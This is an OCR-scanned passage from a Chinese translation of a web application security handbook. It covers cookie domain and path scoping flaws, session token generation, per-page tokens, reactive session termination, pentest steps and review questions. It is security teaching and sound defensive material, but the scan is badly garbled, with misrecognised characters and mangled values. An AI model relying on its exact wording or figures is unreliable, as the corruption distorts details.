令 牌 。 每 名 用 户 都 可 以 创建 目 己 的 博客 ， 通 过 以 用 户 名 为 前 绥 的 一 个 
新 的 子 域 进行 访问 ， 例 如 : 


herman.wahh-blogs.com 
solero.wahh-blogs.com 


因为 cookie 被 目 动 重新 提交 到 这 个 范围 内 的 每 一 个 子 域 ， 当 一 名 
已 经 登录 的 用 户 浏 览 其 他 用 户 的 博客 时 ， 他 的 会 话 令 牌 将 与 其 请 求 一 
起 提交 。 如 有 末 人 允许 博客 作者 在 他 们 上 自己 的 博客 中 插入 任意 JavaScript 脚 
本 ( 束 像 现在 的 许多 博客 应 用 程序 那样 ) ， 那 么 一 个 恶意 博客 作者 台 
能 够 以 和 保存 型 跨 站 点 脚本 攻击 一 样 的 方式 窃取 其 他 用 户 的 会 话 令 牌 

〈 请 参阅 第 12 章 了 解 相关 内 容 ) 。 

之 所 以 会 出 现 这 样 的 问题 ， 是 因为 用 户 创作 的 博客 是 处 理 验 证 和 
会 话 管理 的 主 应 用 程序 的 子 域 。HTTP cookie 并 没有 能 力 帮 助 应 用 程序 
防止 主 域 发 布 的 cookie 被 重新 提交 给 它 的 子 域 。 

要 解决 这 个 问题 ， 主 应 用 程序 可 以 使 用 一 个 不 同 的 域名 (如 
www.wahh-blogs.com) ， 并 以 这 个 完全 合格 的 域名 为 它 的 会 话 令 牌 
cookie 的 域 范 围 。 这 样 ， 如 果 登 录用 户 浏 览 其 他 用 户 的 博客 ， 会 话 
cookie 束 不 会 被 提交 

如 果 一 个 应 用 程序 明确 以 一 个 父 域 作为 它 的 cookie 域 范围 ， 歌 会 
出 现 这 种 漏洞 的 另 一 个 版 本 。 例 如 ， 假 设 一 个 安全 性 至 关 重 要 的 应 用 
程序 位 于 域 sensitiveapp.wahh-organization.com 上 ， 当 它 建 立 cookie 时 , 
它 目 由 设置 的 域 范围 如 下 : 


Set-cookie: se onId=12df098ad80 219; domain=wahh-organization.com 


这 样 做 造成 的 上 ERE: SHA Hei 访问 wahh-organization.com 使 用 的 每 
a 六 子 域 时 ， 机 密 应 用 程序 的 会 话 令 牌 cookie 都 将 被 提交 。 这 些 子 域 
包括 


www.wahh-organization.com 


testapp.wahh-organization.com 


虽然 这 些 应 用 程序 可 能 全 都 属于 拥有 机 密 应 用 程序 的 同一 组 织 ， 
See 不 应 将 敏感 应 用 程序 的 cookie 提 交 给 其 他 应 用 程 


口 负责 其 他 应 用 程序 的 人 员 与 负责 机 密 应 用 程序 的 人 员 的 信任 级 
别 不 同 。 


口 与 前 面 的 博客 应 用 程序 一 样 ， 其 他 应 用 程序 的 功能 可 能 会 将 提 
交 给 应 用 程序 的 cookie 值 泄露 给 第 三 方 。 

口 其 他 应 用 程序 可 能 并 不 像 机 密 应 用 程序 那样 遵循 同样 严格 的 安 
全 标准 ， 或 者 接受 全 面 的 安全 测试 (因为 它们 不 够 重要 、 并 不 处 理 敏 
感 数 据 ， 或 者 仅 为 测试 目的 而 建立 ) 。 应 用 程序 中 存在 的 许多 漏洞 
〈 例 如 路 站 点 脚本 漏洞 ) 可 能 不 会 影响 它们 的 安全 状况 ， 但 外 部 攻击 
人 
SHE o 


T 注解 通常 而 言 ， 基 于 域 的 cookie 隔 离 并 不 像 同 源 策略 (请 


参阅 第 3 章 ) 那样 严格 。 除 了 在 处 理 主机 名 时 讨论 的 问题 外 ， 浏 览 
器 还 会 在 确定 cookie 范 围 时 忽略 协议 和 端口 号 。 如 果 某 个 应 用 程序 


与 男 一 个 不 可 信和 的 应 用 程序 共 至 主机 名 ， 并 依赖 协议 或 端口 号 中 的 
蓉 异 来 阳 离 目 和 映 ， 那 么 ， 攻 击 者 通过 处 理 cookie 即 可 轻而易举 地 破 
坏 这 种 隔离 。 该 应 用 程序 发 布 的 任何 cookie 都 可 被 与 它 共 孚 主机 名 
的 不 可 信 应 用 程序 访问 。 


渗透 测试 步骤 


审查 应 用 程序 发 布 鸣 所 有 cookie， 检 查 用 于 控制 cookie 范 围 的 任 
何 domain 属 性 。 
(1) 如 果 应 用 程序 将 cookie 范 围 明 确 放 宽 到 父 域 ， 则 该 应 用 程 


序 可 能 易于 受到 通过 其 他 Web 应 用 程序 实施 的 攻击 。 
(2) 如 果 应 用 程序 将 它 的 cookie 范 围 设 置 为 自己 的 域名 (或 者 
并 未 指定 domain 属 性 ) ， 则 通过 它 的 子 域 仍然 可 以 访问 其 中 的 应 用 
程序 或 功能 。 
确定 将 收 到 应 用 程序 发 布 的 cookie 的 所 有 可 能 的 域名 。 如 有 果 通 
过 这 些 域名 可 以 访问 任何 其 他 Web 应 用 程序 或 功能 ， 确 定 是 否 可 以 
利用 它们 获得 目标 应 用 程序 的 用 户 发 布 的 cookie。 


2. cookie 路 径 限 制 

位 于 /apps/secure/foo-app/index.jsp 的 应 用 程序 建立 一 个 cookie 后 ， 
浏 蜗 器 会 默认 在 随后 的 所 有 请 求 中 将 cookie 重 新 提交 到 路 
径 /apps/secure/foo-app/ 及 任何 子 目录 。 它 不 会 将 cookie 提 交 到 父 目 录 或 
服务 右上 的 其 他 任何 目录 路 径 。 

与 cookie 范 围 域 限制 一 样 ， 服 务 器 可 以 在 Set-cookie 指 令 中 插入 一 
e 改变 这 种 默认 行为 。 例 如 ， 如 果 应 用 程序 返回 以 下 HTTP 
if j JO > : 


Set-cookie: sessionId=187ab023e09c00a881ia; path=/apps/; 


那么 浏览 器 会 将 这 个 cookie 重 新 返回 到 /apps/ 路 径 的 所 有 子 目 录 中 。 

相 比 于 基于 域 鸣 cookie 施 围 ， 这 种 基于 路 径 的 限制 比 同 源 策略 更 
加 严格 。 因 此 ， 如 果 将 其 作为 一 种 安全 机 制 ， 用 于 防范 同一 域 中 的 不 
可 信 应 用 程序 ， 则 这 种 防御 机 制 几乎 完全 无 效 。 在 菜 个 路 径 上 运行 的 
客户 并 代码 能 够 打开 指 同 同一 域 上 不 同路人 径 的 窗口 或 iframe， 并 人 能够 
读 取 或 写 入 该 窗口 ， 而 不 受 任何 限制 。 因 此 ， 获 取 范 围 为 同一 域 上 的 
其 他 路 径 的 cookie 实 际 上 并 不 困难 。 有 天 更 多 详情 ， 请 参阅 以 下 Amit 
Klein 搂 写 的 论文 : 


http://lists. webappsec.org/pipermail/websecunty_lists.webappsec.org/2006-March/000843.html 


7.4 会 话 管理 的 安全 


鉴于 会 话 管理 机 制 主要 受 两 类 漏洞 的 影响 ，Web 应 用 程序 必须 采 
取 相 应 的 防御 措施 ， 防 止 这 些 机 制 受到 攻击 。 为 安全 地 执行 会 话 管 
理 ， 应 用 程序 必须 以 可 靠 的 方式 生成 令 牌 ， 并 且 必 须 在 令 牌 生成 到 废 
止 的 整个 生命 周期 中 确保 它们 的 安全 。 


7.4.1 ”生成 强大 的 令 牌 


用 于 在 连续 请 求 中 重新 标识 用 户 映 份 的 令 牌 在 其 生成 过 程 中 ， 
不 应 给 攻击 者 提供 任何 机 会 ， 使 其 能 够 以 常规 方式 预测 或 推断 发 布 给 
其 他 用 户 的 令 牌 ， 从 而 从 应 用 程序 中 获得 大 量 的 令 牌 样本 。 

最 有 效 的 令 牌 生成 机 制 应 当 具 备 以 下 两 点 : 

口 使 用 数量 极其 庞大 的 一 组 可 能 值 ; 

口 包含 强大 的 伪 随 机 源 ， 确 保 令 牌 以 无 法 预测 的 方式 平均 分 布 在 
可 能 值 范围 内 。 

从 理论 上 讲 ， 只 要 拥有 足够 的 时 间 和 资产， 任何 数据 ， 无 论 其 长 
度 和 复杂 程度 如 何 ， 都 可 以 使 用 蛮 力 猜测 出 来 。 设 计 强 大 的 令 牌 生成 
机 制 的 目的 在 于 : 即使 屠 意 破坏 的 攻击 者 拥有 大 量 市 宽 和 处 理 资源 ， 
0 
牌 。 

除 服务 器 用 来 定位 处 理 用 户 请 求 的 相关 会 话 对 和 象 的 一 个 标识 符 
外 ， 令 牌 中 不 应 包含 其 他 任何 内 容 。 无 论 是 公开 显示 还 是 隐藏 在 几 层 
编码 或 模糊 处 理 中 ， 令 牌 都 不 应 含有 意义 或 采用 结构 。 所 有 关于 会 话 
所 有 者 与 状态 的 数据 都 应 保存 在 与 会 话 令 牌 对 应 的 服务 闫 会 话 对 象 


中 o 

应 谨慎 选择 随机 源 。 开 发 者 应 当 认识 到 ， 各 种 可 用 的 随机 源 在 强 
度 上 可 能 存在 巨大 的 差异 。 和 java.util.Random 一 样 ， 一 些 随机 源 非 常 
适用 于 各 种 需要 不 断 变化 的 输入 源 的 情况 ， 但 只 需 根据 唯一 一 个 输出 
项 承 可 以 准确 地 推 新 出 它 的 前 后 随机 数 。 开 发 者 应 研究 不 同 的 可 用 随 
机 源 实 际 使 用 算法 的 数学 特性 ， 并 阅读 相关 文档 资料 ， 了 解 API 的 推 
荐 用 法 。 一 般 来 说 ， 如 果 某 种 算法 没有 明确 说 明 它 具有 加 密 安全 性 ， 
那么 应 认为 它 可 被 预测 。 


T 注解 由 于 一 些 高 强度 的 随机 源 必须 采取 步骤 获得 足够 的 


粹 (如 从 系统 事件 中 等 ) ， 它 们 需要 一 段 时 间 才 能 返回 输入 序列 中 


的 下 一 个 值 ， 因 此 可 能 无 法 为 一 些 大 容量 的 应 用 程序 迅速 建立 随机 
数 以 生成 令 牌 。 


除 选 择 最 为 稳定 可 靠 的 随机 源 外 ， 以 与 为 其 生成 令 牌 请 求 有 关 的 
一 些 信息 作为 焕 源 ， 也 是 一 种 民 好 的 做 法 。 这 些 信息 可 能 并 不 是 那个 
请 求 独 有 的 ， 但 却 能 够 非常 有 效 地 消除 所 使 用 的 核心 伪 随 机 数 发 生 妖 
存在 的 任何 缺陷 。 可 被 合并 的 信息 包括 : 

口 来 源 IP 地 址 (source IP address) 及 接收 请 求 的 端口 号 ; 

口 请 求 中 的 User-Agent 消 轧 头 ; 

o 请 求 时 间 (毫秒 ) © 

合并 这 个 炉 的 最 有 效 公式 是 建立 一 个 特殊 的 字符 串 ， 连 接 一 个 伪 
随机 数 、 一 串 上 面 列 出 的 与 请 求 有 关 的 数据 以 及 一 个 仅 服 务 絮 知道 并 
在 每 次 重启 时 重新 生成 的 机 密 字 符 串 。 然 后 ， 使 用 适当 的 散 列 算法 

(例如 ， 使 用 SHA-256 算 法 ) 对 这 个 字符 串 进行 处 理 ， 生 成 一 个 固定 

长 度 、 便 于 管理 的 字符 串 ， 并 以 它 作 为 令 牌 。 (将 最 容易 发 生变 化 的 
es NB BT BOK BIE A BR 
Wv [2] © 


YV 提示 决定 生成 会 话 令 牌 的 算法 后 ， 一 个 有 用 的 “思想 试 
验 ” 是 想象 伪 随 机 源 被 完全 攻破 ， 并 总 是 返回 相同 的 随机 数 。 如 果 
出 现 这 种 情况 ， 那 么 从 应 用 程序 中 获得 大 量 令 牌 样本 的 攻击 者 能 够 
截获 发 布 给 其 他 用 户 的 令 牌 吗 ? 使 用 上 面 摘 述 的 公式 ， 即 使 攻击 者 


完全 了 解 生成 令 牌 所 使 用 的 算法 ， 一 般 也 绝 无 这 种 可 能 。 来 源 IP、 
端口 号 、User-Agent 消 轧 头 和 请 求 时 间 共 同 生成 一 个 数目 庞大 的 
烂 。 即 使 掌握 所 有 这 些 信 息 ， 如 果 不 知道 服务 锅 使 用 的 机 密 字 符 
串 ， 攻 击 者 仍然 无 法 生成 对 应 的 令 牌 。 


建立 一 个 无 法 预测 值 的 安全 令 牌 后 ， 束 必须 在 这 个 令 牌 生成 到 废 
止 的 整个 生命 周期 中 保障 它 的 安全 ， 确 保 不 会 将 其 泄露 给 除 令 牌 用 户 
以 外 的 其 他 任何 人 。 

口令 牌 只 能 通过 HTTPS 传 送 。 任 何以 明文 形式 传送 的 令 牌 都 应 视 
为 被 “污染 ”， 也 吏 是 说 ， 不 能 确保 用 户 吴 份 不 被 泄露 。 如 果 使 用 HTTP 
cookie 传 送 令 牌 ， 应 将 这 些 cookie 标 记 为 安全 ， 以 防止 用 户 浏 虎 右 通 过 
HTTP 传 送 它们 。 如 果 可 能 ， 应 对 每 个 应 用 程序 页 面 使 用 HTTPS， 包 
括 静 态 内 容 〈 如 帮助 页 面 、 图 像 等 ) 。 如 果 没 有 可 能 ， 并 且 仍 然 采 用 
HTTP 服 务 ， 那 么 应 用 程序 应 将 任何 访问 敏感 内 容 (包括 登录 页 面 ) 的 
请 求 重 定 同 到 HTTPS 服 务 。 帮 助 页 面 之 类 的 静态 资源 一 般 不 属于 敏感 
内 容 ， 不 需要 使 用 通过 验证 的 会 话 即 可 访问 ; 因此 ， 可 以 通过 使 用 
ee 指令 强化 cookie 的 使 用 安全 ， 防 止 在 访问 这 些 资源 的 请 求 中 
ELSJE o 
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攻击 ， 并 可 能 使 令 牌 出 现在 各 种 日 志 机 制 中 。 有 时候 ， 开 发 者 在 禁用 
cookie 的 浏览 恬 中 使 用 这 种 技巧 执行 会 话 。 然 而 ， 最 好 是 对 所 有 导航 
使 用 POST 请 求实 现 这 一 目的 ， 并 将 令 和 脾 保 存在 HTML 表单 隐 泸 字段 


中 o 

口 应 总 是 执行 退出 功能 。 通 过 它 删 除 服务 右上 的 所 有 会 话 资源 并 
终止 会 话 令 牌 。 

口 会 话 处 于 非 活动 状态 一 段 时 间 〈 如 10 分 钟 ) 后 ， 应 执行 会 话 终 
止 。 会 话 终止 的 效果 应 和 用 户 完 全 退出 的 作用 完全 相同 。 

口 应 防止 并 行 登 录 。 每 次 一 名 用 户 登 水 ， 都 应 发 布 一 个 新 会 话 令 
牌 ， 同 时 废止 任何 属于 该 用 户 的 现 有 会 话 ， 就 好 像 他 已 经 退出 应 用 程 
序 一 样 。 如 果 旧 令 有 牌 被 保存 一 段 时 间 ， 那 么 随后 收 到 任何 使 用 该 令 牌 
提出 的 请 求 ， 都 应 回 用 户 发 出 安全 警报 ， 告 诉 他 们 会 话 已 被 终止， 
为 他 已 经 从 其 他 位 置 登录 。 

口 如 果 应 用 程序 包含 任何 可 以 查看 会 话 令 牌 的 管理 或 诊断 功能 ， 
应 对 这 种 功能 加 以 严密 保护 ， 以 防止 未 授权 的 访问 。 许 多 时 候 ， 这 种 
功能 根本 没有 必要 显示 会 话 令 牌 ， 相 反 ， 它 应 提供 足够 的 与 会 话 所 有 
者 有 天 的 信息 ， 以 便于 执行 任何 支持 和 诊断 任务 。 这 样 做 就 不 会 泄露 
该 用 户 提 交 的 会 话 令 牌 ， 使 攻击 者 动 持 他 的 会 话 。 

口 应 尽 可 能 限定 应 用 程序 会 话 cookie 的 域 和 路 径 苑 围 。 范 围 过 于 
宽泛 的 cookie 通 党 是 由 配置 不 佳 的 Web 应 用 程序 平台 或 Web 服 务 器 生成 
的 ， 而 不 是 由 应 用 程序 开发 者 本 人 生成 的 。 通 过 应 用 程序 cookie 范 围 
中 的 域名 或 URL 路 径 ， 应 无 法 访问 其 他 Web 应 用 程序 或 不 可 信 的 功 


能 。 应 特别 注意 用 于 访问 应 用 程序 域名 的 任何 现 有 子 域 。 有 时 ， 为 了 
确保 不 会 造成 这 种 漏洞 ， 必 须 修 改组 织 所 使 用 的 各 种 应 用 程序 的 域 和 
路 径 命 名 方案 。 

应 采取 特殊 措施 保护 会 话 管理 机 制 的 安全 ， 防 止 应 用 程序 用 户 成 
为 各 种 攻击 的 目标 。 

口 应 严格 审查 应 用 程序 的 代码 库 ， 以 确定 并 删除 任何 跨 站 点 脚本 
漏洞 “请 参阅 第 12 章 了 解 相关 内 容 ) 。 许 多 这 类 漏洞 可 被 用 于 攻击 会 
话 管理 机 制 ， 特 别 是 保存 型 (或 二 阶 ) XSS 攻 击 ， 它 可 对 每 一 种 会 话 
Lit FS Sj EHF es BAIA ° 
口 不 应 接受 用 户 提 交 、 但 服务 器 并 不 认可 的 任意 令 牌 。 应 立即 在 
i 妖 中 取消 该 令 牌 ， 并 将 用 户 返 回 到 应 用 程序 的 起 始 页 面 。 

口 在 执行 转账 之 类 的 重要 操作 之 前 ， 要 求 进 行 两 步 确认 或 重新 验 
有 效 防 御 跨 站 点 请 求 伪 造 和 其 他 会 话 攻击 。 

口 不 完全 依赖 HTTP cookie 传 送 会 话 令 牌 可 防御 跨 站 点 请 求 伪 造 攻 
击 。 使 用 cookie 机 制 会 造成 这 种 漏洞 是 因为 ， 无 论 什 么 原因 提出 请 
求 ， 浏 览 器 都 会 自动 提交 cookie。 如 果 总 是 通过 HTML 表 单 隐 藏 字段 传 
送 令 牌 ， 那 么 除非 攻击 者 已 经 知道 令 有 牌 ， 否 则 他 就 无 法 建立 一 个 表 
单 ， 再 通过 提交 该 表单 执行 未 授权 操作 ; 当然 ， 如 果 他 已 经 知道 令 
牌 ， 就 可 以 轻易 实施 支持 攻击 。 每 页 面 令 牌 也 有 助 于 防止 这 些 攻 击 

〈 请 参阅 下 一 节 了 解 相关 内 容 ) 。 

口 成 功 验证 后 应 总 是 建立 一 个 新 的 会 话 ， 以 避免 会 话 固定 攻击 的 
影响 。 如 果 应 用 程序 并 不 使 用 验证 机 制 ， 但 允许 提交 敏感 数据 ， 那 么 
会 话 固定 攻击 造成 的 威胁 就 更 难以 解除 。 一 种 可 能 的 解决 办 法 是 使 提 
交 敏 感 数据 的 页 面 序列 尽 可 能 短 ， 并 且 在 这 个 序列 的 第 一 个 页 面 建立 
一 个 新 的 会 话 (如 有 必要 ， 从 现 有 会 话 中 复制 任何 需要 的 数据 ， 如 购 
物 车 的 内 容 ) ， 或 者 使 用 每 页 面 令 牌 (参阅 下 一 节 ) 防止 知道 第 一 个 
页 面 所 使 用 的 令 牌 的 攻击 者 访问 随后 的 页 面 。 除 非 完 全 有 必要 ， 否 则 
不 得 向 用 户 显 示 个 人 数据 。 即 使 有 必要 (如 显示 地 址 的 “确认 订单 ”页 
面 ) ， 也 不 得 向 用 户 显 示 信 用 卡号 码 和 密码 之 类 的 敏感 数据 ， 并 且 应 
在 应 用 程序 的 啊 应 中 隐藏 这 些 数据 。 

每 页 面 令 牌 

应 在 会 话 令 牌 的 基础 上 使 用 每 页 面 令 牌 ， 对 会 话 实 施 更 加 严格 的 
控制 ， 更 有 效 地 防御 或 阻 断 各 种 会 话 攻击 。 使 用 每 页 面 令 牌 时 ， 每 次 
用 户 请 求 一 个 应 用 程序 页 面 (例如 ， 不 是 图 像 ) ， 应 用 程序 都 会 建立 
一 个 新 的 页 面 令 脾 ， 并 通过 cookie 或 HTML 表 单 隐 藏 字段 将 其 传送 给 客 
户 端 。 用 户 每 次 提出 一 个 请 求 ， 除 通过 主 会 话 令 牌 进行 正常 确认 外 ， 


ay 


i 
证 


可 


页 面 令 牌 还 根据 最 后 发 布 的 令 牌 值 进行 再 次 检验 。 如 采 出 现 不 匹配 的 
情况 ， 整 个 会 话 将 被 终止 。 因 特 网 上 的 许多 安全 性 至 天 重要 的 应 用 程 
Fe “如 电子 银行 ) ， 都 使 用 每 页 面 令 牌 来 强化 对 会 话 令 牌 机 制 的 保 
护 ， 如 图 7-12 所 示 。 
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图 7-12 ”银行 应 用 程序 使 用 的 每 页 面 令 牌 


虽然 使 用 每 页 面 令 牌 确实 给 导航 造成 一 些 限 制 (例如 ， 使 用 “后 
退 ” 和 “前 进 ” 按 钮 以 及 多 窗口 浏览 方面 ) ， 但 它 能 够 有 效 防御 会 话 固定 
攻击 ， 并 确保 如 采 合 法 用 户 和 攻击 者 同时 使 用 一 个 被 支持 的 会 话 提出 
相同 的 请 求 ， 该 请 求 会 立即 被 应 用 程序 终止 。 每 页 面 令 牌 还 可 用 于 追 
踩 用 户 的 位 置 和 在 应 用 程序 中 的 活动 情况 ， 检 测 出 不 按 预 定 顺序 访问 
To ela 并 有 助 于 防止 某 些 访问 控制 缺陷 “请 参阅 第 8 章 了 解 
ERAR) 。 


7.4.3 日 志 、 监 控 与 


应 用 程序 的 会 话 管理 功能 应 与 它 的 日 志 、 监 控 与 警报 机 制 紧 密 结 
合 ， 以 提供 适当 的 反常 行为 记录 ， 并 帮助 管理 员 在 必要 时 采取 防御 措 
fi o 


ot 


口 应 用 程序 应 监控 包含 无 效 令 牌 的 请 求 。 除 非 令 牌 很 容易 被 预 
测 ， 否 则 ， 攻 击 者 束 需 要 提出 大 量 包 含 无 效 令 牌 的 请 求 ， 才 能 成 功 猜 
测 出 应 用 程序 发 布 给 其 他 用 户 的 令 牌 ， 从 而 在 应 用 程序 的 日 志 中 留 下 
明显 的 痕迹 。 

口 很 难 完全 阻止 针对 会 话 令 牌 的 亦 力 攻击 ， 因 为 我 们 无 法 通过 蔡 
用 特殊 用 户 账户 或 会 话 来 终止 这 种 攻击 。 一 种 可 能 的 防御 方法 十 在 收 
到 大 量 包 含 无 效 令 牌 的 请 求 时 将 其 来 源 IP 地 址 屏蔽 一 段 时 间 。 然 而 ， 
如 果 一 个 用 户 的 请 求 来 自 几 个 IP 地 址 (如 AOL 用 户 ) ， 或 者 几 个 用 户 
的 请 求 来 自 同 一 个 IP 地 址 (如 执行 网 络 地 址 转换 的 代理 服务 器 或 防火 
墙 中 的 用 户 ) ， 这 种 方法 就 不 能 发 挥 太 大 的 作用 。 

口 即使 无 法 立即 有 效 防 止 针对 会 话 的 歼 力 攻击 ， 但 保留 详细 的 日 
志 并 问 管 理 员 发 出 警报 仍然 可 帮助 他 们 对 攻击 进行 调查 ， 并 尽 其 所 能 
采取 适当 的 行动 。 

口 只 要 有 可 能 ， 应 同 用 户 和 警告 与 会 话 有 关 的 反 毅 事件 ， 例 如 并 行 
登录 或 明显 的 劫持 攻击 (使 用 每 页 面 令 牌 检测 ) 。 即 使 用 户 的 令 牌 已 
被 攻破 ， 这 样 做 也 可 促使 用 户 进行 检查 ， 看 是 否 发 生 转 账 之 类 的 未 授 
权 操 作 。 

反应 性 会 话 终止 

会 话 管理 机 制 可 非常 有 效 地 防御 许多 针对 应 用 程序 的 其 他 攻击 。 
如 果 收 到 用 户 提交 的 反常 请 求 〈 例 如 ， 任 何 包含 被 修改 的 隐藏 HTML 
表单 字段 或 URL 碍 询 字 符 串 参数 的 请 求 、 任 何 包 含 与 SQL 广 入 或 跨 站 
点 脚本 攻击 有 天 的 字符 串 请 求 ， 以 及 任何 正常 情况 下 已 经 被 长 度 限 制 
之 类 的 客户 端 检查 阻止 的 用 户 输入 ) ， 那 么 一 些 安 全 性 至 关 重 要 的 应 
用 程序 (如 电子 银行 ) 会 极其 迅速 地 终止 用 户 的 会 话 。 

当然 ， 任 何 使 用 这 类 请 求 可 对 其 加 以 利用 的 漏洞 都 必须 从 源头 进 
行 清除 。 但 是 ， 迫 使 用 户 每 次 提交 一 个 无 效 请 求 时 都 需要 进行 重新 验 
证 ， 这 会 显著 延长 探查 应 用 程序 漏洞 所 需 的 时 间 ， 即 使 采用 目 动 扩 巧 
a 
能 发 现 它 们 。 

如 果 执 行 这 种 防御 ， 为 方便 测试 ， 建 议 在 需要 时 可 轻易 将 其 关 
闭 。 如 采 在 对 应 用 程序 进行 合法 渗透 测试 时 ， 这 种 防御 殉 像 是 遇 到 真 
正 的 攻击 者 那样 减缓 应 用 程序 的 啊 应 速度 ， 那 么 它 的 效率 吏 会 显著 降 
低 。 与 不 使 用 这 种 机 制 相 比 ， 使 用 它 很 可 能 会 在 代码 中 造成 更 多 的 漏 
洞 。 


渗透 测试 步骤 


如 有 果 所 攻击 的 应 用 程序 使 用 这 种 防御 机 制 ， 渗 透 测 试 员 可 能 发 
现在 应 用 程序 中 探查 各 种 常见 的 漏洞 非常 费时 ， 每 次 测试 失败 后 都 
需要 再 次 登录 并 重新 导航 到 正在 分 析 的 位 置 ， 因 此 不 久 后 束 会 主动 
放弃 攻击 。 

这 种 烦恼 可 以 使 用 自动 工具 来 解除 。 当 使 用 Burp Intruder 发 动 


攻击 时 ， 可 以 使 用 “获取 cookie” (Obtain Cookie) 特性 在 每 次 测试 前 
重新 登录 ， 并 使 用 新 的 会 话 令 牌 (只 要 应 用 程序 采用 单 阶段 登录 机 
制 ) 。 当 手动 浏览 和 探查 应 用 程序 时 ， 可 以 通过 IBurpExtender 接 口 

使 用 Burp Proxy 的 扩展 性 特性 。 渗 透 测 试 员 可 以 建立 一 个 扩展 ， 检 

测 应 用 程序 何 时 执行 强制 退出 、 自 动 登录 到 应 用 程序 并 将 新 会 话 和 
页 面 返回 给 浏览 器 ， 同 时 选择 使 用 弹出 消息 通知 所 发 生 的 一 切 。 虽 
然 使 用 这 种 方法 并 不 能 完全 解决 这 个 问题 ， 但 在 某 些 情况 下 能 显著 
减轻 它 造成 的 影响 。 


7.5 ”人 小结 


攻击 者 在 攻击 应 用 程序 时 ， 会 话 管理 机 制 中 存在 的 诸多 漏洞 为 他 
们 提供 了 大 量 的 攻击 目标 。 鉴 于 其 在 多 个 请 求 中 确定 相同 用 户 身 份 过 
程 中 所 发 挥 的 重要 作用 ， 不 完善 的 会 话 管 理 功 能 通常 会 成 为 攻击 者 “ 进 
入 应 用 程序 王国 的 钥 怀 ”。 对 攻击 者 来 说 ， 进 入 其 他 用 户 的 会 话 当 然 不 
E 
EP ° 

现实 世界 的 会 话 管理 功能 中 往往 存在 各 种 各 样 的 缺陷 。 当 应 用 程 
序 采用 定制 机 制 时 ， 其 中 可 能 会 存在 各 种 薄弱 环节 ， 并 有 无 数 种 攻击 
方法 可 供 攻 击 者 利用 。 耐 心 与 坚持 不 懈 十 我 们 从 中 汲取 到 的 最 重要 的 
教训 。 许 多 会 话 管理 机 制 初 看 起 来 似乎 安全 可 靠 ， 但 仔细 分 析 后 却 发 
现 它们 并 不 合格 。 解 译 应 用 程序 如 何 生成 看 似 随 机 的 令 牌 序列 ， 这 个 
过 程 既 费时 又 费力 。 但 由 于 这 样 做 通 稼 可 获得 巨大 的 回报 ， 因 而 值得 
为 之 花费 时 间 和 精力 。 


A] 


7.6 [A 


欲 知 问题 答案 ， 请 访问 http://mdsec.net/wahh ° 
(1) 登录 一 个 应 用 程序 后 ， 服 务 器 建立 以 下 cookie: 


Set-cookie: sessiq=amltMjM6MTIOMToxMTK0OCODcwODYz ; 
一 个 小 时 后 ， 再 次 登录 并 得 到 以 下 cookie: 
Set-cookie: sessid=amltMjJM6MTIOMToxMTkOODcIMTMy ; 


通过 这 些 cookie， 可 以 得 出 什么 推论 

(2) BA REI OR the) Se ASE SE OIE ORE 
个 字符 组 成 的 数字 字母 密码 。 它 们 全 都 由 某 种 无 法 预测 的 算法 随机 生 
i « o 其 中 哪 一 个 最 有 可 能 成 为 蛮 力 猜测 攻击 的 目标 ? 列 出 影响 你 做 出 
决策 的 各 种 不 同 因 素 。 

(3) 登录 位 于 以 下 URL 的 一 个 应 用 程序 : 


https://foo.wahh-app.com/login/home.php 


服务 器 建立 以 下 cookie: 


Set-cookie: sessionId=1498172056438227; domain=foo.wahh- 
app.com; path=/login; HttpOnly; 
然后 访 | ne ° 浏览 器 会 将 sessionId cookie 提 交 给 哪些 

URL? ( 选 出 全 部 答案 。】 
) 人 
) https://bar.wahh-app.com/login 
) https://staging.foo.wahh-app.com/login/home.php 
) 
) 


http://foo.wahh-app.com/login/myaccount.php 
http://foo.wahh-app.com/logintest/login.php 
f) https://foo.wahh-app.com/logout 
g) https://wahh-app.com/login/ 
h) https://xfoo.wahh-app.com/login/myaccount.php 

(4) 所 针对 的 应 用 程序 除 使 用 主 会 话 令 牌 外 ， 还 使 用 每 页 面 令 
牌 。 如 果 收 到 一 个 不 按 顺 序 发 送 的 每 页 面 令 牌 ， 整 个 会 话 将 被 终止 。 


假设 发 现 了 某 种 缺陷 ， 可 通过 它 预 测 或 截获 应 用 程序 发 布 给 当前 正在 
访问 应 用 程序 的 其 他 用 户 的 令 牌 。 那 么 能 够 劫持 他 们 的 会 话 吗 ? 
(5) 登录 一 个 应 用 程序 后 ， 服 务 器 建立 以 下 cookie: 


Set-cookie: sess=ab11298f7eg14; 
单 击 “退出 ”按钮 后 ， 应 用 程序 执行 以 下 客户 端 脚本 : 


document.cookie="sess="; 


document. location="/"; 
通过 这 种 行为 ， 可 以 得 出 什么 结论 ? 


D Fete IO, A (entropy) 可 用 作 某 事件 不 确定 度 的 量度 。 信 息 量 
越 大 ， 体 系 结构 越 规 则 ， 功 能 越 完善 ， 燃 整 越 小 。 一 一 译 者 注 

[2] 雪 毅 效应 ， 加 密 算 法 的 一 种 特征 ， 指 明文 或 密 钥 的 少量 变化 会 引起 
密 文 的 很 大 变化 。 一 一 译 者 注 


从 逻辑 上 讲 ， 应 用 程序 核心 安全 机 制 的 访问 控制 建立 在 验证 和 会 
话 管 理 之 上 。 到 现在 为 止 ， 我 们 已 经 了 解 了 应 用 程序 如 何 首 先 核 实用 
尸 的 映 份 ， 然 后 确认 它 收 到 的 某 个 特殊 的 请 求 序列 由 该 用 户 提 出 。 应 
用 程序 之 所 以 需要 这 样 做 ， 至 少 从 安全 上 讲 ， 是 因为 它 必须 决定 是 否 
允许 某 个 请 求 执行 特定 的 操作 或 访问 它 请 求 的 资源 。 访 问 控制 是 应 用 
程序 的 一 个 重要 防御 机 制 ， 因 为 它们 负责 做 出 这 些 关 键 决 定 。 如 采访 
问 控制 存在 缺陷 ， 攻 击 者 往往 能 够 攻破 整个 应 用 程序 ， 欣 制 其 管理 功 
能 并 访问 属于 其 他 用 户 的 敏感 数据 。 

如 第 1 革 所 述 ， 不 完善 的 访问 控制 中 最 第 见 的 Web 应 用 程序 漏洞， 
影响 了 我 们 最 近 测 试 的 719% 的 应 用 程序 。 我 们 发 现 应 用 程序 做 出 一 切 
努力 执行 稳定 的 验证 与 会 话 管理 机 制 ， 但 由 于 没有 在 它们 上 面 建立 任 
何 有 效 的 访问 控制 ， 因 而 浪费 了 这 方面 的 投资 ， 这 种 情况 非常 常见 。 
这 些 漏洞 如 此 普遍 的 一 个 原因 在 于 ， 需 要 对 每 一 个 请 求 ， 以 及 特殊 用 
